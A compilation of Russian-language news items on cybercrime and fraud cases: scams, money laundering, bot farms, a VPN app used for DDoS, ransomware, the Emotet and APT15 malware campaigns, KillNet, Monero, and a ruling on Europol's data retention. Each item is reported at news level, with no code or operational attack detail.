Житель американского Бриджпорта (штат Коннектикут) признал себя виновным в банковском мошенничестве в штате Род-Айленд. Стало известно, что 26-летний Майкл Джошуа Сент-Виктор (Michael Joshua Saint-Victor) создал онлайн-счет в местном банке на имя жителя Род-Айленда, а затем перевел на него деньги с реального счета этого же человека.
Общая сумма нанесенного Сент-Виктором ущерба составила 65,5 тысячи долларов. При этом сообщается, что как только банк выявил активность, показавшуюся ему аномальной, все средства в полном объеме были возвращены их владельцу. Благодаря этому финансовой организации также удалось предотвратить выпуск кредитной карты на имя все того-же жителя штата, чего добивался подозреваемый.
Что любопытно, по неизвестным причинам расследованием дела занималась Секретная служба США. Приговор Сент-Виктору будет вынесен 1 ноября 2023 года.
Трое жителей американского Лос-Анджелеса были признаны виновными в отмывании более 2,5 миллиона долларов с помощью подарочных карт Target. Сведения о них троица получила от китайских фишеров через WeChat.
Вся троица — выходцы из Китая, самому старшему из них — лишь 35 лет. По версии следствия, с которой согласился суд, они были средним звеном масштабной транснациональной группировки. Все начиналось со звонков, которые получали жертвы от людей, представлявшихся сотрудниками правоохранительных органов или государственными служащими.
– Blade Bai, 35, of El Monte
– Bowen Hu, 28, of Hacienda Heights
– Tairan Shi, 29, of Diamond Bar
Они уверяли, что адресат звонка стал жертвой преступников и у него украдены либо личность, либо деньги со счетов. В некоторых случаях использовалась таргетированная фишинговая рассылка на электронную почту от имени служб поддержки различных банков и компаний.
Для решения возникших сложностей жертв просили отправить оплату в виде подарочных карт Target. Как правило, фишеры просили не одну карту, а минимальная ее стоимость должна была составлять 500 долларов. Накопив как минимум пять тысяч таких карт, злоумышленники продали их троим обвиняемым.
Те, в свою очередь, с помощью дропов потратили карты на покупку множества
товаров и услуг. Один из этих дропов уже предстал перед судом и был приговорен
к 20 месяцам тюрьмы. Сама троица узнает о своих сроках в январе 2024 года.
Каждому из них грозит по 20 лет заключения.
source: yahoo.com/news/3-l-county-residents-stole-022316053.html
Очередное дело про "дорогую любовь по переписке" заведено в Беларуси. На этот раз на удочку мошенника попалась жительница Гомеля. Она перевела кавалеру 60 тысяч белорусских рублей, сообщили в Следственном комитете.
Женщина эта замужняя. Еще больше удивляет другой факт – даме 56 лет. Но, как говорится, любви все возрасты покорны.
С мужчиной, представившимся гражданином Великобритании, гомельчанка познакомилась в соцсетях. Они долго переписывались. Мужчина рассказал много печальных подробностей из своей жизни. В частности, историю о гибели в автокатастрофе жены и дочери в Египте, а также о проживающем в спецшколе сыне- подростке. А сам он нечастный вынужден на протяжении двух лет без отпуска работать врачом в Сомали.
Спустя несколько месяцев "английский врач" написал, что у него наконец появилась возможность съездить в отпуск в Лондон. Не против он был заглянуть и в Беларусь.
Правда, как обычно бывает в подобных случаях, у влюбленного иностранца вдруг появились финансовые проблемы. Сперва он просил денег на дорогу, а потом и на другие нужды. Конечно же, обещал все вернуть.
За полтора месяца сердобольная женщина перевела на указанные им счета в общей сложности свыше 60 тысяч рублей. Она не только вынесла из дома все сбережения, но даже брала кредиты.
Опять же, как всегда бывает в подобных историях, после того, как деньги "ушли", переписка оборвалась – влюбленный врач пропал.
Как выяснили правоохранители, большую часть денег потерпевшая перевела на карточки, принадлежащие двум белорускам. Ранее эти женщины попались на крючок "Фредерика из Марокко", который попросил их зарегистрировать и отправить по почте банковские карты. Жительницы Брестской и Минской областей поверили, что для получения пособия для его детей в Гане нужна иностранная платежная карта.
Возбуждено уголовное дело по ч.4 ст.209 за мошенничество в особо крупном размере.
Фигуранты использовали фейковые аккаунты в соцсетях для проведения информационно-психологических операций агрессора, оправдания действий оккупантов, распространения противоправного контента, распространения персональных данных и мошенничества и тому подобное.
Профилактические мероприятия под условным названием «Ботоферма» продолжались в течение месяца. Киберполицейские совместно со следственными подразделениями Нацполиции провели 21 санкционированный обыск и изъяли компьютерную технику, мобильные телефоны, более 250 GSM-шлюзов и около 150 тысяч сим-карт различных мобильных операторов.
В частности правоохранители разоблачили жителей Винницы, Запорожья и Львова. Всего для функционирования ботоферм было задействовано более 100 человек.
Киберполицейские установили, что злоумышленники использовали специальное оборудование и программное обеспечение для регистрации тысяч учетных записей ботов в различных соцсетях с последующим запуском рекламы, нарушавшей нормы и законодательство Украины.
Кроме распространения вражеской пропаганды, аккаунты также использовались для несанкционированного распространения в сети Интернет персональных данных граждан Украины, в схемах интернет-мошенничества и для рассылки заведомо ложных сообщений об угрозе безопасности граждан, уничтожения или повреждения объектов собственности.
Открыты уголовные производства по ст. 361 (Несанкционированное вмешательство в работу информационных (автоматизированных), электронных коммуникационных, информационно-коммуникационных систем, электронных коммуникационных сетей), ст. 361-2 (Несанкционированные сбыт или распространение информации с ограниченным доступом, которая хранится в электронно-вычислительных машинах (компьютерах), автоматизированных системах, компьютерных сетях или на носителях такой информации), ст. 190 (Мошенничество), ст. 259 (Заведомо ложное сообщение об угрозе безопасности граждан, уничтожения или повреждения объектов собственности) Уголовного кодекса Украины.
Следственные действия продолжаются.
Приложение автоматически превращает смартфон в инструмент для DDoS-атак.
Swing VPN – Fast VPN Proxy — это официальное VPN-приложение, разработанное
Limestone Software Solutions для Android и iOS. Однако, по словам
исследователя Лекроми (Lecromee), версия этого приложения для Android является
ботнетом и выполняет DDoS-атаки.
Все началось с того, что друг Лекроми сообщил ему о необычной
последовательности запросов на его мобильном телефоне. Телефон постоянно
отправлял запросы на определенный веб-сайт каждые 10 секунд. Приложение якобы
использовало различные тактики, чтобы скрыть свои вредоносные действия, чтобы
атака оставалась незамеченной.
Первоначально Лекроми списал эту деятельность на вредоносное ПО или вирус.
Однако дальнейшее расследование показало, что все запросы отправлялись из приложения Swing VPN, которое его друг установил на свой телефон. Запросы были отправлены на тот же сайт, на который друг Лекроми никогда не заходил, что вызвало у исследователя подозрения.
Эксперт выяснил, что приложение определяет настоящий IP-адрес пользователя сразу после установки, выбора языка и принятия Политики конфиденциальности. Приложение также анализирует возвращаемый с сайта HTML-код и идентифицирует IP-адреса из ответов, в основном для поиска файлов конфигурации для загрузки.
После определения требуемого типа конфигурации приложение отправляет запросы к двум разным файлам конфигурации, хранящимся в личной учетной записи Google Диска разработчика. Эти файлы запрашиваются с определенных персональных серверов, нескольких репозиториев GitHub или учетных записей Google Диска.
Приложение завершает процесс инициализации, подключаясь к рекламной сети для загрузки рекламы, и сохраняет данные в локальном кэше, прежде чем начать DDoS- атаку сайта. Запросы Swing VPN отправляются на сайт Туркменских авиалиний (turkmenistanairlines.tm).
В штате Кентукки вынесли приговор 24-му участнику преступной группы, промышлявшей мошенничеством на онлайн-аукционах. Решением суда 35-летний уроженец Румынии Йонут-Разван Санду (Ionut-Razvan Sandu) наказан лишением свободы на срок 7 лет и 5 месяцев.
По данному делу проходит 28 ответчиков, всем инкриминируется совершение преступлений, предусмотренных RICO — американским законом о противодействии рэкету и коррупции. Четверо соучастников (все румыны) были осуждены два месяца назад и получили от пяти до неполных шести лет тюремного заключения.
Согласно материалам дела, с 2014 года Санду и другие участники ОПГ наживались на обмане граждан, совершающих покупки в интернете. Сообщники регистрировали аккаунты на популярных онлайн-аукционах и торговых площадках вроде eBay, размещали там объявления о продаже подержанных автомобилей и других несуществующих товаров, а затем пытались убедить покупателей безотлагательно совершить платеж.
Чтобы вызвать искомую реакцию, аферисты выдавали себя за персону, которую обстоятельства вынудили срочно продать предмет торга, — например, военного, отбывающего на службу. Для пущей убедительности потенциальной жертве демонстрировали инвойс с логотипом известной компании или просили обратиться за разъяснениями в клиентскую службу, под которую был заранее создан кол- центр.
Получив перевод, базирующиеся в США мошенники, в том числе Санду, обращали реальные деньги в криптовалюту и выводили ее за рубеж. Там происходил обратный процесс — биткоины конвертировались в фиатную валюту.
Таким образом ныне осужденному и сообщникам удалось совокупно отмыть свыше $3,5 млн, полученных в результате реализации преступной схемы. На настоящий момент в США выявлено более 900 жертв мошенничества. В расследовании принимали участие правоохранители США и их коллеги из Румынии и Болгарии.
Стоит отметить, что подобные схемы мошенничества были популярны в криминальных кругах лет 10 назад. Действующими лицами зачастую оказывались выходцы из Румынии или Болгарии.
source: justice[.]gov/opa/pr/man-sentenced-integral-role-sophisticated- international-fraud-scheme
У Hive грязная стратегия – вымогатели “жалят” сети жертвы вредоносами, пока не получат выкуп.
Вчера ФБР заявило о том,
что печально известная группировка
Hive заработала около $100 млн с
июня 2021 года. За это время от атак злоумышленников пострадало более 1300
компаний. Согласно сообщению агентства, Hive жестко обходится с теми, кто
отказывается платить выкуп и пытается восстановить свои системы – хакеры
повторно заражают сети жертв различными вымогательскими программами, пока не
получат выкуп.
Жертвами киберпреступников стали организации из самых разных отраслей
промышленности и критически важных секторов инфраструктуры (правительственные
учреждения, телекоммуникационные и IT-компании). Этому была посвящена часть
сообщения, созданная при поддержке CISA и Министерства здравоохранения и
социальных служб США.
Цель такого сообщения проста – агентства хотят помочь ИБ-специалистам быстрее
и проще обнаруживать вредоносную активность группировки. Для этого к письму
были прикреплены индикаторы компрометации и TTP (тактики, техники и процедуры)
Hive.
Стоит отметить, что агентства призывают не платить выкуп злоумышленникам, так
как это может стать сигналом к наступлению для других банд вымогателей. Вместо
этого жертвам рекомендуется сообщать об атаках Hive в местные отделения ФБР
или CISA. Это поможет правоохранительным органам собрать важную информацию,
необходимую для отслеживания активности вымогательских кампаний,
предотвращения новых атак или привлечения злоумышленников к ответственности за
их действия.
В дежурную часть отдела полиции (Карасунский округ) Управления МВД России по городу Краснодару с сообщением о мошенничестве обратился местный житель. Заявитель пояснил, что по объявлению в сети Интернет договорился о покупке акустических колонок и перевел на счет продавца в качестве предоплаты денежные средства. Однако злоумышленник взятые на себя обязательства по доставке товара не выполнил и перестал выходить на связь.
В результате проведения оперативно-розыскных мероприятий с использованием технических средств полицейские установили личность и местонахождение подозреваемого. Находясь в служебной командировке в Тульской области, краснодарские оперативники по подозрению в совершении противоправного деяния задержали 35-летнего мужчину и доставили в краевой центр.
При дальнейшей проверке установлена причастность мужчины еще к 19 фактам мошенничества под предлогом продажи музыкального оборудования. Общая сумма ущерба потерпевшим составила более 100 000 рублей.
В настоящее время следственным подразделением УМВД России по городу Краснодару в отношении подозреваемого возбуждено уголовное дело по признакам преступлений, предусмотренных статьей 159 УК РФ «Мошенничество». Санкции указанной статьи предусматривают максимальное наказание в виде лишения свободы на срок до пяти лет. На период предварительного следствия злоумышленнику избрана мера пресечения в виде подписки о невыезде и надлежащем поведении.
Сотрудниками Управления уголовного розыска МВД по Республике Коми и отдела полиции №1 УМВД России по городу Сыктывкару в результате проведения оперативных мероприятий задержан уроженец Челябинска, подозреваемый в мошенничестве в отношении жителей столицы РК.
Оперативники задержали молодого человека в торговом центре у банкомата с крупной суммой денежных средств при себе. Установлено, что уроженец Челябинска прибыл в Сыктывкар ранним утром и до обеда успел обмануть не менее трех местных жителей, обманом похитив порядка двух миллионов рублей.
Злоумышленник действовал в составе организованной группы по следующей схеме. «Работники» колл-центра путем случайного набора домашних телефонов подыскивали абонентов пожилого возраста. Далее пенсионерам поступал звонок якобы от родственницы. Собеседница говорила, что в результате дорожно-транспортного происшествия ее госпитализировали в больницу и необходимо принести предметы личной гигиены. Также звонившая добавляла, что является виновницей ДТП и следует решить вопрос с полицией о непривлечении к ответственности путем передачи правоохранителям некой суммы денежных средств. Затем потерпевшим звонил «следователь» и в ходе телефонного разговора оговаривался размер вознаграждения. В завершение собеседник заявлял, что за личными вещами и деньгами заедет помощник, которым и являлся уроженец Челябинска. Молодой человек приезжал к потерпевшим домой, забирал наличные и предметы личной гигиены.
На счету злоумышленника не менее трех эпизодов преступной деятельности, по которым следователи отдела полиции №1 УМВД России по городу Сыктывкару возбудили уголовные дела в соответствии со статьей 159 Уголовного кодекса Российской Федерации. Фигурант, действуя по аналогичной схеме, обманул жителей Челябинской, Курганской и Кировской областей. Часть из похищенных денежных средств он успел перечислить на банковские счета, указанные ему участниками организованной группы. При задержании полицейские изъяли сотовые телефоны и 796 тысяч рублей.
Расследование уголовных дел продолжается. Уроженец Челябинска передан сотрудникам полиции в Кировской области и находится под арестом.
«Сотрудниками отдела «К» Главного управления МВД России по Новосибирской области задержаны девять жителей региона, пятеро из которых ранее судимы. Они подозреваются в серии мошенничеств, совершенных группой лиц по предварительному сговору.
По версии следствия, злоумышленники приобрели у неизвестных лиц базу данных с именами и телефонами жителей различных регионов России, которые через Интернет отправляли в финансовые организации заявки на получение кредита. С декабря 2021 г. до апреля текущего года участники криминальной схемы звонили им и представлялись сотрудниками банков. Для дистанционного оформления займа требовали оплатить дополнительные услуги – комиссию за безналичный перевод, страховку и работу курьера. В качестве реквизитов платежа указывали номера банковских карт предполагаемого организатора группы. После получения денег общение с потерпевшими прекращалось.
В гараже, который использовался в качестве кол-центра, а также в жилищах фигурантов проведены обыски. Изъяты компьютерная техника, банковские и сим- карты, мобильные телефоны и другие предметы, имеющие доказательственное значение.
Следователем Главного следственного управления ГУ МВД России по Новосибирской области возбуждены уголовные дела по признакам преступлений, предусмотренных частью 2 статьи 159 УК РФ. В отношении семи подозреваемых избрана мера пресечения в виде заключения под стражу, двоим – в виде подписки о невыезде и надлежащем поведении», - сообщила официальный представитель МВД России Ирина Волк.
Киберпреступник при перепродаже получил всего 2% от запрошенной цены.
Криптосообщество World of Solana (WOS) отследило и вернуло часть NFT, украденных для перепродажи. Предметы цифрового искусства удалось выкупить всего за 2% от стоимости, назначенной злоумышленником.
Все началось со взлома канала Discord студии разработки кроссчейн-игр Uncharted NFT. Мошенникам удалось опустошить 109 пользовательских кошельков и увести более чем 150 токенов SQL , а также 25 невзаимозаменяемыми токенами (NFT) World of Solana (WOS), в том числе 3 редких о очень ценных цифровых коллекционных предмета.
После взлома сообщество WOS разработало идеальный план по возвращению NFT, увеличив роялти за украденные невзаимозаменяемые токены до 98% процентов с традиционных 5% .
Спустя два дня на платформе злоумышленник выставил на продажу все 25 NFT. Члены World of Solana смогли выкупить у него 15 предметов, остальные 10 были куплены другим пользователем.
Позднее, этому покупателю было отправлено сообщение о том, что он приобрел краденые предметы и не сможет их продать. Пользователю предложили возмещение, и он согласился помочь вернуть NFT.
В World of Solana более 2000 различных героев. Самый дорогой аватар в настоящее время продается за 123 SOL (5600 долларов). Текущая минимальная цена коллекции оценивается в 2,03 SOL.
source: metacrunch.org/wos-community-recovers-stolen-non-fungible-tokens-by- scammer
Подозреваемого задержали, у него изъяли 240 млн рублей, $1 млн и €70 тыс.
Следователи МВД расследуют первое в России уголовное дело, связанное с растратой денег и имущества криптовалютной биржи. Как сообщила официальный представитель ведомства Ирина Волк, подозреваемый в совершении данного преступления задержан, у него изъято 240 млн рублей, $1 млн и €70 тыс.
"В производстве следователей следственного департамента МВД России находится уголовное дело, возбужденное по признакам преступления, предусмотренного ч. 4 ст. 160 УК РФ. В результате проведенных совместно с сотрудниками управления "К" МВД России, ФСБ России и Росфинмониторинга оперативно-разыскных мероприятий полицейские установили местонахождение и задержали подозреваемого в хищении денежных средств и имущества криптовалютной биржи", - сказала она.
По словам Волк, подозреваемый задержан в гостинице частного аэродрома в Серпуховском городском округе Подмосковья. "У него при себе в двух дорожных чемоданах находились наличные деньги в сумме свыше 190 млн рублей. Кроме того, одновременно проведено 29 обысков в жилищах фигуранта и его предполагаемых сообщников в Москве, Санкт-Петербурге, Новосибирске и Ялте. Изъято свыше 50 млн рублей, $1 млн, €70 тыс., дорогостоящее компьютерное оборудование, аппаратные криптокошельки, предметы роскоши и документы, имеющие доказательственное значение", - добавила представитель ведомства.
По версии следствия, подозреваемым в совершении преступления оказался один из фактических владельцев торговой интернет-площадки, на которой цифровые финансовые активы можно было купить, продать либо обменять на реальные деньги. Злоумышленник осуществлял контроль за движением крупных сумм в криптовалюте и их переводом на электронные кошельки. При этом, воспользовавшись своим положением, он вывел часть средств и присвоил их.
В настоящее время задержанному предъявлено обвинение, он арестован, на счета фигуранта наложен арест. Кроме того, в суд направлено ходатайство о наложении ареста на имущество обвиняемого, стоимость которого превышает 2 млрд рублей.
source: tass.ru/proisshestviya/14142225
Внезапно оживший троян Emotet начал устанавливать на зараженные машины Cobalt Strike Beacon, открывая злоумышленникам доступ к сети для продолжения атаки. Не исключено, что новую возможность начнут использовать для внедрения шифровальщиков — операторы таких вредоносных программ охотно отдают взлом сетей на аутсорс.
В прошлом возможности Emotet неоднократно использовались для засева других зловредов (TrickBot, Qbot), а те уже могли загрузить дополнительные инструменты атаки — к примеру, популярный у киберкриминала тулкит Cobalt Strike. На днях наблюдатели заметили, что вернувшийся после разгромной акции троян напрямую, без прежних посредников устанавливает маячок Cobalt Strike.
Этот довесок объявляется далеко не всегда, но, оказавшись в системе, сразу пытается связаться со своим C2-сервером, а затем деинсталлируется. В некоторых случаях зараженной машине отдается команда на установку тулкита Cobalt Strike.
Сам Emotet при этом собирает немного данных, основным оружием в этом плане является Cobalt Strike. С помощью этого инструмента пентеста можно получить много полезной информации о сети или ее домене с тем, чтобы запустить туда дополнительных зловредов — например, шифровальщика.
Такой исход вполне вероятен: как выяснил BleepingComputer, на возращении Emotet очень настаивали операторы Conti. Использование Emotet в тандеме с Cobalt Strike должно значительно ускорить заражение сетей тем или иным вымогателем: обычно такие вредоносы появляются в них через месяц после первичного проникновения.
Впрочем, истинные намерения операторов Emotet пока не ясны. Они могут использовать новую тактику для собственных нужд (проведения разведки в сети), могут также запустить партнерские программы на основе возрождающегося ботнета.
Специалисты команды Threat Hunter из Symantec [сообщают](https://symantec- enterprise-blogs.security.com/blogs/threat-intelligence/flea-backdoor- microsoft-graph-apt15), что китайские «правительственные» хакеры из группировки APT15 (она же Flea, BackdoorDiplomacy, ke3chang, Nylon Typhoon, Playful Taurus, Royal APT и Vixen Panda), применяют новый бэкдор Graphican.
Вредоносная кампания с использованием Graphican длилась в период с конца 2022 по начало 2023 года и была направлена на министерства иностранных дел в странах Центральной и Южной Америки.
Новый бэкдор — это эволюция старой малвари [Ketrican](https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets- diplomatic-missions/), которую ранее использовала группировка, а не инструмент, полностью созданный с нуля. Функции Ketrican давно были объединены с другим вредоносом, Okrum, для создания новой вредоносной программы, получившей название [Ketrum](https://intezer.com/blog/research/the-evolution- of-apt15s-codebase-2020/).
Graphican отличается от своих предшественников тем, что что использует Microsoft Graph API и OneDrive для скрытого получения адресов C&C-инфраструктуры в зашифрованном виде, что делает его более универсальным и устойчивым.
Работа Graphican на зараженном устройстве включает в себя следующее действия:
При помощи управляющего сервера злоумышленники могут отправлять малвари различные команды, включая запуск программ, загрузку новых файлов, создание интерактивной командной строки, а также настройку скрытых процессов для сбора интересующих хакеров данных.
Другие инструменты, которые исследователи Symantec связывают с новой кампанией APT15:
Исследователи заключают, что использование нового бэкдора доказывает, что, несмотря на долгие годы активности, группировка все еще продолжает создавать новые инструменты.
«Сходство функциональности Graphican с известным бэкдором Ketrican может указывать на то, что группа не слишком обеспокоена тем, что ее связывают со всей этой активностью», — пишут специалисты.
Click to expand...
Главным управлением цифрового развития предварительного следствия подведены промежуточные итоги работы следственной и межведомственной групп по уголовному делу в отношении участников киберпреступных скам-групп.
Справочно: Для обеспечения надлежащего качества и оперативности расследования по согласованию с руководством Следственного комитета в августе текущего года в состав следственной группы по делу включены следователи территориальных отделов ведомства. Также приказом Министра внутренних дел, согласованным с Председателем Следственного комитета, по уголовному делу создана межведомственная рабочая группа, в состав которой включены представители главного управления цифрового развития предварительного следствия.
В ходе расследования получена информация, что установленные скам-группы являются крупнейшими действующими на территории Беларуси киберпреступными группировками. Участники организованных преступных групп с 2021 года по 2023 год совершили более 8 000 хищений у белорусов путем «фишинга». В их состав входили более 2 000 человек. В рамках оперативно-разыскных мероприятий, проведенных совместно с МВД и при активном участии следователей областных управлений, задержано более 25 участников скам-групп, в отношении 15 обвиняемых применена мера пресечения в виде заключения под стражу. На данный момент в одном производстве соединено более 1 200 уголовных дел, возбужденных территориальными подразделениями Следственного комитета по фактам хищений денег с карт-счетов.
Благодаря тесному взаимодействию двух ведомств и предпринятым организационным мерам только за прошлый месяц по делу удалось установить причастность участников организованной преступной группы еще к 208 хищениям, а также выявлено 270 фактов преступной деятельности «скамеров», по которым потерпевшие в правоохранительные органы не обращались.
Работа по установлению всех участников скамм-групп и совершенных ими преступлений продолжается.
• Source: sk.gov.by/ru/news-ru/view/podrobnosti-rassledovanija-ugolovnogo- dela-v-otnoshenii-uchastnikov-skamm-grup-13041
По словам участников кибергруппировки KillNet, им удалось «положить»
Федеральную налоговую платёжную систему США. В качестве доказательства хакеры
приложили отчёты площадки check-host.
Соответствующая запись появилась в Telegram-канале “WE ARE KILLNET“ в ночь с 30 июня на 1 июля. В ней участники группы пишут про тестирование нового метода, подразумевая, наверно, метод атаки на веб-сайты.
«Оставляем DDOS payusatax.com на цикле "Бесконечный запрос"», — пишет KillNet.
В подтверждение своих слов хакеры опубликовали два отчёта сервиса check-
host.net: первый и второй. На них видно, что сайт Payusatax.com действительно
недоступен.


Напомним, несколько дней назад группировки KillNet и NoName057(16) атаковали
сайт налоговой и онлайн-бухгалтерию Литвы. Неделей ранее хакеры провели ещё
одну кибероперацию, в ходе которой досталось интернет-ресурсам Литвы: МВД,
операторам связи, платёжной системе.
Прокуратора США западного округа Вашингтона сообщила о приговоре двум американцам, которым грозит тюрьма за отмывание денег с помощью криптовалют и производство наркотиков.
Отец и сын из города Монро штата Вашингтон приговорены к пяти годам по обвинению в незаконном производстве марихуаны и использовании биткоинов для отмывания денег. Под суд пошли 28-летний Кеннет Уоррен Рул (Kenneth Warren Rhule) и его отец, 47-летний Кеннет Джон Рул (Kenneth John Rule).
Министерство внутренней безопасности и Управление по борьбе с наркотиками в 2020 году завершили расследование спецоперацией по задержанию пары из Монро. Агенты под прикрытием, выдавая себя за торговцев людьми, обратились к Кеннету Уоррену Рулу за тем, чтобы отмыть якобы незаконно полученные $142 000, вырученные от торговли людьми, через биткоины. Ничего не подозревающий преступник конвертировал деньги в BTC и дал советы по использованию цифровой валюты для сокрытия доходов от налогообложения.
Министерство юстиции сообщает, что пара управляла бизнесом по производству нелицензионных продуктов, используя наличные деньги и криптовалюту для продажи их клиентам в США. Прокурор США Ник Браун (Nick Brown) сообщил, что преступная деятельность принесла семейству Рул более $13 млн, а чистая прибыль составила $2.5 млн.
«Эта пара не только производила и распространяла продукты с марихуаной в даркнете в нарушение государственной схемы регулирования, но и незаконно отмывала огромное количество биткоинов», — заявил Браун.
• Source: justice[.]gov/usao-wdwa/pr/father-and-son-sentenced-prison-money- laundering-and-illegal-marijuana-business
Анонимные монеты наподобие Monero ставят полную анонимность участников транзакций выше удобства в использовании.
Анонимная криптовалюта Monero набирает популярность у кибервымогателей, сообщает недавно приобретенная Mastercard компания CipherTrace.
Согласно новому отчету компании за 2021 год, кибервымогательские группировки все чаще стали требовать у своих жертв выкуп в Monero (XMR), а за платежи в биткойнах запрашивают дополнительные 10-20%.
Анонимные монеты представляют собой криптовалюту, которая ставит полную анонимность участников транзакций выше удобства в использовании. Они являются альтернативой биткойну, чьи транзакции записываются в блокчейн, который может просмотреть кто угодно и который нельзя изменить.
«Вымогательское ПО в основном рассматривается как проблема криминальная, однако вскоре она может стать проблемой геополитической. Я использую теорию игр для изучения программ-вымогателей, а также изучаю, как такие страны, как Северная Корея, используют киберинструменты для достижения стратегических целей. Мои исследования показывают, что использование шифрования для геополитических целей – лишь вопрос времени. Это облегчит мелким и бедным игрокам получение уступок от более сильных противников», – сообщала в прошлом году эксперт по санкциям в отношении КНДР Дженни Джун в статье Politico.
Этими игроками необязательно должны быть государства. С помощью анонимных монет путем шантажа уступок смогут добиваться, например, террористы, отказываясь расшифровывать данные, если не будут отпущены заключенные.
Еще один тренд – двойное вымогательство, которое специалисты CipherTrace назвали «новой тревожной тенденцией в продолжающейся эволюции вымогательского ПО». В таких атаках не только шифруются данные, но вымогатели также угрожают раскрыть их, если жертва не заплатит выкуп. Лидер в этой области Monero не позволяет пользователям включать и выключать конфиденциальность, в отличие от главных конкурентов Dash (DASH) и Zcash (ZEC).
В настоящее время рыночная капитализация Monero составляет $4,8 млрд.
Среди инструментов, использующихся Monero для обеспечения анонимности участников транзакций, — кольцевые подписи, скрытые адреса и кольцевые конфиденциальные транзакции. Кольцевые подписи группируют средства пользователей вместе, поэтому определить, кто из участников совершил транзакцию, невозможно. Скрытые адреса – случайные, одноразовые адреса, создаваемые во время каждой транзакции, скрывающие истинный адрес кошелька как отправителя, так и получателя.
source: 4345106.fs1.hubspotusercontent- na1.net/hubfs/4345106/Content/Current%20Trends%20in%20Monero%20Usage%20and%20Ransomware_FINAL.pdf?utm_campaign=Research&utm_medium=email&_hsmi=210465645&utm_content=210465645
Полицейское агентство ЕС, Европол, будет вынуждено удалить большую часть обширного хранилища персональных данных, которые, как было установлено надзорным органом ЕС по защите данных, были незаконно собраны. Беспрецедентный вывод Европейского инспектора по защите данных (EDPS) нацелен на то, что эксперты по конфиденциальности называют «ковчегом больших данных», содержащим миллиарды байт информации. Конфиденциальные данные в ковчеге были взяты из отчетов о преступлениях, взломаных зашифрованных телефонных служб и собраны у потенциальных претендентов на статус беженца, никогда не причастных к какому- либо преступлению.
Согласно внутренним документам, с которыми ознакомились журналисты Guardian, кэш Европола содержит не менее 4 петабайт, что эквивалентно 3 млн компакт- дисков или пятой части всего содержимого Библиотеки Конгресса США. Сторонники защиты данных говорят, что объем информации, хранящейся в системах Европола, равнозначен массовой слежке и является шагом на пути к тому, чтобы стать европейским аналогом Агентства национальной безопасности США (АНБ), организации, чей тайный онлайн-шпионаж был раскрыт разоблачителем Эдвардом Сноуденом.
Среди квадриллионов хранящихся байтов есть конфиденциальные данные по крайней мере о четверти миллиона нынешних или бывших подозреваемых в терроризме и серьезных преступлениях, а также о множестве других людей, с которыми они вступали в контакт. Архив информации был получен от органов национальной полиции за последние шесть лет в виде серии дампов данных из неизвестного количества уголовных расследований.
Наблюдательный орган приказал Европолу стереть данные, которые хранились более шести месяцев, и дал ему год на то, чтобы разобраться, что можно хранить на законных основаниях.
Конфронтация противопоставляет надзорный орган ЕС по защите данных мощному агентству безопасности, которое стремится стать центром машинного обучения и искусственного интеллекта в полиции.
Постановление также выявляет глубокие политические разногласия среди лиц, принимающих решения в Европе, по поводу компромиссов между безопасностью и конфиденциальностью. Конечный результат их противостояния имеет значение для будущего конфиденциальности в Европе и за ее пределами.
Комиссар ЕС по внутренним делам Илва Йоханссон выступила в защиту Европола. «Правоохранительные органы нуждаются в инструментах, ресурсах и времени для анализа данных, которые передаются им на законных основаниях», — сказала она. «В Европе Европол является платформой, которая поддерживает органы национальной полиции в решении этой сложнейшей задачи».
Комиссия заявляет, что юридические проблемы, поднятые EDPS, создают «серьезную проблему» для способности Европола выполнять свои задачи. В прошлом году были предложены радикальные изменения в правилах, лежащих в основе полномочий Европола. В случае принятия закона предложения могут фактически задним числом легализовать кеш данных и сохранить его содержимое в качестве испытательного полигона для новых инструментов искусственного интеллекта и машинного обучения.
Европол отрицает какие-либо правонарушения и заявил, что наблюдательный орган, возможно, интерпретирует действующие правила непрактичным образом: «Регламент Европола не задумывался законодателем как требование, которое не может быть выполнено контролером данных [т.е. Европолом]»
Европол работал с EDPS, чтобы «найти баланс между обеспечением безопасности ЕС и безопасностью его граждан при соблюдении самых высоких стандартов защиты данных», говорится в сообщении агентства.
Европол, созданный как координирующий орган для национальных полицейских сил в ЕС со штаб-квартирой в Гааге, был предложен некоторыми государствами-членами как решение проблемы терроризма после терактов в Батаклане в 2015 году и призвал собирать данные по нескольким направлениям.
Теоретически Европол подлежит жесткому регулированию в отношении того, какие персональные данные он может хранить и как долго. Входящие записи должны строго классифицироваться и обрабатываться или сохраняться только в том случае, если они имеют потенциальное отношение к важной работе, такой как борьба с терроризмом. Но полное содержание того, что в нем содержится, неизвестно, отчасти из-за того, что EDPS обнаружила, что Европол обрабатывает данные бессистемно.
Лишь небольшое число европейцев узнало, что их собственные данные хранятся в архиве, и никто из них, как известно, не смог добиться раскрытия информации. Франк ван дер Линде, которого вместе с родственниками из Нидерландов включили в список террористов, а затем удалили, является одним из редких примеров такого обращения с конфиденциальными данными.
Политический активист, чьи единственные серьезные столкновения с полицией сводились к разбиванию окна, чтобы проникнуть в здание и создать сквот для бездомных, был исключен властями Нидерландов из списка наблюдения только в 2019 году. Но за год до этого он переехал в Берлин, что побудило голландскую полицию поделиться его данными с немецкими коллегами и Европолом. О своих данных в архиве Европола активист узнал только тогда, когда увидел частично рассекреченное досье в мэрии Амстердама.
Чтобы добиться удаления своих личных данных из любых международных баз данных, он обратился в Европол. Активист был удивлен, когда в июне 2020 года он получил официальный ответ, что у него нет ничего, к чему он «имеет право доступа». Активист обратился с жалобой в ЭДП. «Я не знаю, удалили ли они данные после того, как голландские власти обновили их, [что] они не считают меня экстремистом… Европол — это черная дыра».
«Легкость попадания в такой список просто ужасна», — говорит Ван дер Линде. «Шокирует то, как легко полиция делится информацией через границы, и ужасает, как трудно удается удалить себя из этих списков».
Осведомленность об обращении Европола с конфиденциальными данными побудила наблюдательный орган поднять собственные вопросы в 2019 году. Его первоначальные выводы, сделанные в сентябре того же года, показали, что наборы данных, которыми поделились с Европолом, хранились без надлежащих проверок, чтобы убедиться, что люди, содержащиеся в них, должны отслеживаться или их данные просто там хранятся. Доступ к «ковчегу» разрешен только уполномоченному персоналу, и большая часть его содержимого была исследована, очищена и использована на законных основаниях.
Когда Европол не смог убедительно ответить на опасения наблюдательного органа, EDPS в сентябре 2020 года публично предупредил полицейское управление, разъяснив, что поставлено на карту: «Субъекты данных рискуют быть неправомерно связанными с преступной деятельностью на территории ЕС, со всеми возможными последствиями, в том числе потенциальным ущербом их личной и семейной жизни, свободе передвижения и занятостью».
